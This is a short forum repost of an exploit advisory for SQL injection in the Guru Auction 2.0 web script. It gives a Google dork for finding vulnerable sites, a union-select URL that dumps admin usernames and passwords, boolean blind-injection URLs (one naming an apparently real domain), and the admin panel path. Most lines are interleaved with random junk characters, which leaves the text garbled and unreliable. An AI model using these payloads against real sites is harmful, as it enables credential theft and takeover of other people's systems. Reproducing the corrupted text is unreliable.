Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
, ~) j9 Y: o9 Q0 f+ J2 v R2 \9 D7 p! q' _' z
作者 : v3n0m
% v* V1 g* P; ?- K3 M2 }# `; H+ H5 t应用 : Guru Auction 2.0, _. `) L" M/ w" m
Price : $49
2 j e9 c0 o! y: Z$ ^Vendor : http://www.guruscript.com/
# B. ?4 ?8 L/ r. {) x/ AGoogle Dork : inurl:subcat.php?cate_id=+ Q! R# d7 D9 U
9 c* f0 y* @% X) H; C
SQLi p0c:
. ]. |4 m$ h5 Z) F9 Q3 \~~~~~~~~~~7 t& e7 f9 @- y
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--# e$ ^6 H$ k* E
8 g3 }: @4 S5 c$ k
% h3 P9 t! ~! M6 E3 ^( {! ?% G盲注 p0c:; l4 [# m2 _( k9 t3 B0 H
~~~~~~~~~~( \- e$ p, W- M! N- z
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
/ t; U) [0 g0 \8 U) Q+ |# B I) ^7 F$ ahttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
( q0 x7 |- I: C' v l _( z$ o( ?: y
管理登录入口:+ ~+ n0 F9 h# U9 w1 Y" [7 v9 J- S, O
~~~~~~~~~~/ z5 M& ?0 \2 q7 l' ?
http://domain.tld/[path]/admin/
" l! z- v1 n- |. @+ c |
发表于 2012-12-31 09:24:05
收藏
支持
反对